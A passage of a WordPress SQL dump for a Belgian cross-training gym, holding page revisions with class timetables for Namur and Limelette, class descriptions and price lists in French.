class=\"trip\"><b>18h15</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>18h15</b>\r\nGLFE</td>\r\n<td class=\"tglfe\"><b>11h30</b>\r\nGLFE</td>\r\n<td class=\"ttrx\"><b>11h30</b>\r\nTRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"trip\"><b>19h</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h</b>\r\nGLFE</td>\r\n<td class=\"ttrx\"><b>19h</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>19h</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>19h</b>\r\nRIP-KETTLE</td>\r\n<td class=\"trip\"><b>12h</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tcardio\"><b>12h</b>\r\nCARDIO</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tcardio\"><b>19h45</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>19h30</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h45</b>\r\nGLFE</td>\r\n<td class=\"ttrx\"><b>19h15</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>19h45</b>\r\nCARDIO</td>\r\n<td class=\"tcellule\"></td>\r\n<td class=\"tcellule\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n<span style=\"text-decoration: underline; background: #F2F5A9;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline; background: #E6E6E6;\"><strong>Circuit GLFE :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline; background: #A9F5A9;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issus de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline; background: #A9F5F2;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n<h2></h2>\r\n<h2>Duo Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h2></h2>\r\n<h2>Personal Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h2></h2>\r\n<h2>Coaching nutritionnel :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h2></h2>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 6 mois illimité : 399.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances - Limelette', '', 'inherit', 'open', 'open', '', '383-revision-v1', '', '', '2013-11-03 08:54:51', '2013-11-03 08:54:51', '', 383, 'http://www2.crosstrainingcenter.be/383-revision-v1/', 0, 'revision', '', 0),
(385, 1, '2013-11-03 08:56:21', '2013-11-03 08:56:21', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenu\">\r\n<div align=\"center\">\r\n\r\n<a title=\"Les séances – Namur\" href=\"http://www2.crosstrainingcenter.be/les-seances/\">Namur</a>\r\n\r\n</div>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenu\">\r\n<div align=\"center\">\r\n\r\n<a title=\"Les séances – Limelette\" href=\"http://www2.crosstrainingcenter.be/les-seances-limelette/\">Limelette</a>\r\n\r\n</div>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h1>&nbsp;</h1>\r\n<h1>&nbsp;</h1>\r\n<h1 style=\"text-align: center;\">Choix d\'une salle</h1>\r\n<img class=\"size-full wp-image-446 aligncenter\" alt=\"map\" src=\"http://www2.crosstrainingcenter.be/wp-content/uploads/2013/11/map.png\" width=\"300\" height=\"236\" usemap=\"#imagemap\" />\r\n\r\n                        <map name=\"imagemap\" id=\"Map\"> \r\n                        <area shape=\"namur\" coords=\"90,84,166,108\" href=\"http://www2.crosstrainingcenter.be/les-seances-limelette/\" /> \r\n                        <area shape=\"limelette\" coords=\"174,121,233,132\" href=\"http://www2.crosstrainingcenter.be/les-seances/\" /> \r\n                        </map> \r\n', 'Les séances', '', 'publish', 'closed', 'open', '', 'les-seances-2', '', '', '2013-11-03 10:41:37', '2013-11-03 10:41:37', '', 0, 'http://www2.crosstrainingcenter.be/?page_id=385', 0, 'page', '', 0),
(386, 1, '2013-11-03 08:56:21', '2013-11-03 08:56:21', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n\r\n<div align=\"center\">\r\n\r\nNamur\r\n\r\n\r\n</div>\r\n\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n\r\n<div align=\"center\">\r\n\r\nLimelette\r\n\r\n\r\n</div>\r\n\r\n</div></td>\r\n</tr>\r\n</table>', 'Les séances', '', 'inherit', 'open', 'open', '', '385-revision-v1', '', '', '2013-11-03 08:56:21', '2013-11-03 08:56:21', '', 385, 'http://www2.crosstrainingcenter.be/385-revision-v1/', 0, 'revision', '', 0),
(387, 1, '2013-11-03 08:57:14', '2013-11-03 08:57:14', '', 'Séances', '', 'publish', 'open', 'open', '', 'seances', '', '', '2013-11-03 09:49:54', '2013-11-03 09:49:54', '', 0, 'http://www2.crosstrainingcenter.be/?p=387', 4, 'nav_menu_item', '', 0),
(389, 1, '2013-11-03 08:57:54', '2013-11-03 08:57:54', '<blockquote>\r\n<h1>Envie de vous essayer au cross training?</h1>\r\n</blockquote>\r\nVenez nous rencontrer afin de découvrir le déroulement d\'une séance de cross training.\r\n\r\nLaissez-nous vos coordonnées et nous vous recontacterons afin de planifier avec vous votre première séance gratuite.\r\n\r\n[contact-form-7 id=\"265\" title=\"Seance_gratuite\"]', 'Séance gratuite', '', 'inherit', 'open', 'open', '', '266-revision-v1', '', '', '2013-11-03 08:57:54', '2013-11-03 08:57:54', '', 266, 'http://www2.crosstrainingcenter.be/266-revision-v1/', 0, 'revision', '', 0),
(446, 1, '2013-11-03 10:39:45', '2013-11-03 10:39:45', '', 'map', '', 'inherit', 'open', 'open', '', 'map', '', '', '2013-11-03 10:39:45', '2013-11-03 10:39:45', '', 385, 'http://www2.crosstrainingcenter.be/wp-content/uploads/2013/11/map.png', 0, 'attachment', 'image/png', 0),
(391, 1, '2013-11-03 08:59:00', '2013-11-03 08:59:00', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n\r\n<div align=\"center\">\r\n\r\nNamur\r\n\r\n\r\n</div>\r\n\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n\r\n<div align=\"center\">\r\n\r\nLimelette\r\n\r\n\r\n</div>\r\n\r\n</div></td>\r\n</tr>\r\n</table>\r\n<a href=\"http://www2.crosstrainingcenter.be/wp-content/uploads/2013/11/map.png\"><img src=\"http://www2.crosstrainingcenter.be/wp-content/uploads/2013/11/map-300x235.png\" alt=\"map\" width=\"300\" height=\"235\" class=\"alignnone size-medium wp-image-390\" /></a>', 'Les séances', '', 'inherit', 'open', 'open', '', '385-revision-v1', '', '', '2013-11-03 08:59:00', '2013-11-03 08:59:00', '', 385, 'http://www2.crosstrainingcenter.be/385-revision-v1/', 0, 'revision', '', 0),
(392, 1, '2013-11-03 08:59:29', '2013-11-03 08:59:29', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<div align=\"center\">\r\n\r\nNamur\r\n\r\n</div>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<div align=\"center\">\r\n\r\nLimelette\r\n\r\n</div>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<a href=\"http://www2.crosstrainingcenter.be/wp-content/uploads/2013/11/map.png\"><img class=\"size-medium wp-image-390 aligncenter\" alt=\"map\" src=\"http://www2.crosstrainingcenter.be/wp-content/uploads/2013/11/map-300x235.png\" width=\"300\" height=\"235\" /></a>', 'Les séances', '', 'inherit', 'open', 'open', '', '385-revision-v1', '', '', '2013-11-03 08:59:29', '2013-11-03 08:59:29', '', 385, 'http://www2.crosstrainingcenter.be/385-revision-v1/', 0, 'revision', '', 0),
(393, 1, '2013-11-03 08:59:46', '2013-11-03 08:59:46', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<div align=\"center\">\r\n<h1>Namur</h1>\r\n</div>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<div align=\"center\">\r\n<h1>Limelette</h1>\r\n</div>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<a href=\"http://www2.crosstrainingcenter.be/wp-content/uploads/2013/11/map.png\"><img class=\"size-medium wp-image-390 aligncenter\" alt=\"map\" src=\"http://www2.crosstrainingcenter.be/wp-content/uploads/2013/11/map-300x235.png\" width=\"300\" height=\"235\" /></a>', 'Les séances', '', 'inherit', 'open', 'open', '', '385-revision-v1', '', '', '2013-11-03 08:59:46', '2013-11-03 08:59:46', '', 385, 'http://www2.crosstrainingcenter.be/385-revision-v1/', 0, 'revision', '', 0),
(394, 1, '2013-11-03 09:00:07', '2013-11-03 09:00:07', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<div align=\"center\">\r\n<h1>Namur</h1>\r\n</div>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<div align=\"center\">\r\n<h1>Limelette</h1>\r\n</div>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<br>\r\n<br>\r\n<br>\r\n<a href=\"http://www2.crosstrainingcenter.be/wp-content/uploads/2013/11/map.png\"><img class=\"size-medium wp-image-390 aligncenter\" alt=\"map\" src=\"http://www2.crosstrainingcenter.be/wp-content/uploads/2013/11/map-300x235.png\" width=\"300\" height=\"235\" /></a>', 'Les séances', '', 'inherit', 'open', 'open', '', '385-revision-v1', '', '', '2013-11-03 09:00:07', '2013-11-03 09:00:07', '', 385, 'http://www2.crosstrainingcenter.be/385-revision-v1/', 0, 'revision', '', 0),
(395, 1, '2013-11-03 09:01:32', '2013-11-03 09:01:32', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<div align=\"center\">\r\n<h1>Namur</h1>\r\n</div>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<div align=\"center\">\r\n<h1>Limelette</h1>\r\n</div>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<br>\r\n<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Nous vous proposons 4 types de séances décrites ci-dessous\r\n\r\n&nbsp;\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n<td class=\"ttitreh\">SAMEDI</td>\r\n<td class=\"ttitreh\">DIMANCHE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttrx\"><b>18h</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>17h30</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>18h</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>17h30</b>\r\nGLFE</td>\r\n<td class=\"ttrx\"><b>17h30</b>\r\nTRX</td>\r\n<td class=\"ttrx\"><b>11h</b>\r\nTRX</td>\r\n<td class=\"tglfe\"><b>11h</b>\r\nGLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tglfe\"><b>18h30</b>\r\nGLFE</td>\r\n<td class=\"ttrx\"><b>18h15</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>18h30</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>18h15</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>18h15</b>\r\nGLFE</td>\r\n<td class=\"tglfe\"><b>11h30</b>\r\nGLFE</td>\r\n<td class=\"ttrx\"><b>11h30</b>\r\nTRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"trip\"><b>19h</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h</b>\r\nGLFE</td>\r\n<td class=\"ttrx\"><b>19h</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>19h</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>19h</b>\r\nRIP-KETTLE</td>\r\n<td class=\"trip\"><b>12h</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tcardio\"><b>12h</b>\r\nCARDIO</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tcardio\"><b>19h45</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>19h30</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h45</b>\r\nGLFE</td>\r\n<td class=\"ttrx\"><b>19h15</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>19h45</b>\r\nCARDIO</td>\r\n<td class=\"tcellule\"></td>\r\n<td class=\"tcellule\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n<span style=\"text-decoration: underline; background: #F2F5A9;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline; background: #E6E6E6;\"><strong>Circuit GLFE :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline; background: #A9F5A9;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issus de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline; background: #A9F5F2;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n<h2></h2>\r\n<h2>Duo Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h2></h2>\r\n<h2>Personal Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h2></h2>\r\n<h2>Coaching nutritionnel :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h2></h2>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 6 mois illimité : 399.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances - Namur', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-11-03 09:01:32', '2013-11-03 09:01:32', '', 11, 'http://www2.crosstrainingcenter.be/11-revision-v1/', 0, 'revision', '', 0),
(396, 1, '2013-11-03 09:01:47', '2013-11-03 09:01:47', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<div align=\"center\">\r\n<h1>Namur</h1>\r\n</div>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<div align=\"center\">\r\n<h1>Limelette</h1>\r\n</div>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<br>\r\n<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Nous vous proposons 4 types de séances décrites ci-dessous\r\n\r\n&nbsp;\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n<td class=\"ttitreh\">SAMEDI</td>\r\n<td class=\"ttitreh\">DIMANCHE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttrx\"><b>18h</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>17h30</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>18h</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>17h30</b>\r\nGLFE</td>\r\n<td class=\"ttrx\"><b>17h30</b>\r\nTRX</td>\r\n<td class=\"ttrx\"><b>11h</b>\r\nTRX</td>\r\n<td class=\"tglfe\"><b>11h</b>\r\nGLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tglfe\"><b>18h30</b>\r\nGLFE</td>\r\n<td class=\"ttrx\"><b>18h15</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>18h30</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>18h15</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>18h15</b>\r\nGLFE</td>\r\n<td class=\"tglfe\"><b>11h30</b>\r\nGLFE</td>\r\n<td class=\"ttrx\"><b>11h30</b>\r\nTRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"trip\"><b>19h</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h</b>\r\nGLFE</td>\r\n<td class=\"ttrx\"><b>19h</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>19h</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>19h</b>\r\nRIP-KETTLE</td>\r\n<td class=\"trip\"><b>12h</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tcardio\"><b>12h</b>\r\nCARDIO</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tcardio\"><b>19h45</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>19h30</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h45</b>\r\nGLFE</td>\r\n<td class=\"ttrx\"><b>19h15</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>19h45</b>\r\nCARDIO</td>\r\n<td class=\"tcellule\"></td>\r\n<td class=\"tcellule\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n<span style=\"text-decoration: underline; background: #F2F5A9;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline; background: #E6E6E6;\"><strong>Circuit GLFE :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline; background: #A9F5A9;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issus de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline; background: #A9F5F2;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n<h2></h2>\r\n<h2>Duo Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h2></h2>\r\n<h2>Personal Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h2></h2>\r\n<h2>Coaching nutritionnel :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h2></h2>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 6 mois illimité : 399.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances - Limelette', '', 'inherit', 'open', 'open', '', '383-revision-v1', '', '', '2013-11-03 09:01:47', '2013-11-03 09:01:47', '', 383, 'http://www2.crosstrainingcenter.be/383-revision-v1/', 0, 'revision', '', 0),
(397, 1, '2013-11-03 09:02:20', '2013-11-03 09:02:20', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<div align=\"center\">\r\n<h1><a title=\"Les séances – Namur\" href=\"http://www2.crosstrainingcenter.be/les-seances/\">Namur</a></h1>\r\n</div>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<div align=\"center\">\r\n<h1><a title=\"Les séances – Limelette\" href=\"http://www2.crosstrainingcenter.be/les-seances-limelette/\">Limelette</a></h1>\r\n</div>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<a href=\"http://www2.crosstrainingcenter.be/wp-content/uploads/2013/11/map.png\"><img class=\"size-medium wp-image-390 aligncenter\" alt=\"map\" src=\"http://www2.crosstrainingcenter.be/wp-content/uploads/2013/11/map-300x235.png\" width=\"300\" height=\"235\" /></a>', 'Les séances', '', 'inherit', 'open', 'open', '', '385-revision-v1', '', '', '2013-11-03 09:02:20', '2013-11-03 09:02:20', '', 385, 'http://www2.crosstrainingcenter.be/385-revision-v1/', 0, 'revision', '', 0),
(398, 1, '2013-11-03 09:03:02', '2013-11-03 09:03:02', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<div align=\"center\">\r\n<h1><a title=\"Les séances – Namur\" href=\"http://www2.crosstrainingcenter.be/les-seances/\">Namur</a></h1>\r\n</div>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<div align=\"center\">\r\n<h1>Limelette</h1>\r\n</div>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Nous vous proposons 4 types de séances décrites ci-dessous\r\n\r\n&nbsp;\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n<td class=\"ttitreh\">SAMEDI</td>\r\n<td class=\"ttitreh\">DIMANCHE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttrx\"><b>18h</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>17h30</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>18h</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>17h30</b>\r\nGLFE</td>\r\n<td class=\"ttrx\"><b>17h30</b>\r\nTRX</td>\r\n<td class=\"ttrx\"><b>11h</b>\r\nTRX</td>\r\n<td class=\"tglfe\"><b>11h</b>\r\nGLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tglfe\"><b>18h30</b>\r\nGLFE</td>\r\n<td class=\"ttrx\"><b>18h15</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>18h30</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>18h15</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>18h15</b>\r\nGLFE</td>\r\n<td class=\"tglfe\"><b>11h30</b>\r\nGLFE</td>\r\n<td class=\"ttrx\"><b>11h30</b>\r\nTRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"trip\"><b>19h</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h</b>\r\nGLFE</td>\r\n<td class=\"ttrx\"><b>19h</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>19h</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>19h</b>\r\nRIP-KETTLE</td>\r\n<td class=\"trip\"><b>12h</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tcardio\"><b>12h</b>\r\nCARDIO</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tcardio\"><b>19h45</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>19h30</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h45</b>\r\nGLFE</td>\r\n<td class=\"ttrx\"><b>19h15</b>\r\nTRX</td>\r\n<td 